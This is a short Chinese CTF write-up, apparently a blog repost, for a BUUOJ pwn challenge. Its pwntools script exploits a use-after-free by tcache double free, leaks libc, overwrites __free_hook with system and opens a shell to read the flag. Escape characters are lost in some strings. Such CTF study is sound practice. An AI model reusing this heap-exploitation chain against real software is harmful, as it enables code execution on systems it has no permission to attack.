自从300题后,难题让人搜不着,也有极简单的题,今天遇到一个
概况:
- c++写的程序,反汇编后一个字符串有1米长
- 冒: 6个字符依次或或6-1得到 H@QRPN
- free未清指针
步骤:
- 输入"NEUQRO" 开始
- 建80,70,10(/bin/shx00)
- free90 八次 70两次 show 0得到libc
- 建70 三次,依次写free_hook,x,system
- free 1
from pwn import * elf = ELF('./pwn') context.arch = 'amd64' local = 0 if local == 1: p = process('./pwn') libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so') one = [0x4240e, 0x42462, 0xe31ee] offset = 0x3b12a0 #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps else: p = remote('node4.buuoj.cn', 25510) libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so') one = [0x4f2c5, 0x4f322, 0x10a38c] offset = 0x3e82a0 #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps # [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')] p.sendlineafter(b'name', b"NEUQRO") menu = b'> n' def add(size, msg): p.sendlineafter(menu, b'1') p.sendlineafter(b'input the size n', str(size).encode()) #<=0x100 p.sendlineafter(b"now you can input something...n", msg) def free(idx): p.sendlineafter(menu, b'2') p.sendlineafter(b'input the indexn', str(idx).encode()) # UAF def show(idx): p.sendlineafter(menu, b'3') p.sendlineafter(b'input the indexn', str(idx).encode()) add(0x80, b'A') add(0x10, b'/bin/shx00') add(0x70, b'A') [free(2) for _ in range(2)] [free(0) for _ in range(8)] show(0) malloc_hook = u64(p.recvuntil(b'x7f', drop=False).ljust(8, b'x00')) - 0x60 -0x10 libc_base = malloc_hook - libc_elf.sym['__malloc_hook'] system = libc_base + libc_elf.sym['system'] free_hook = libc_base + libc_elf.sym['__free_hook'] print('libc:', hex(libc_base)) context.log_level = 'debug' add(0x70, p64(free_hook)) #gdb.attach(p) #pause() add(0x70, b'A') add(0x70, p64(system)) free(1) p.sendline(b'cat /flag') p.interactive()
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)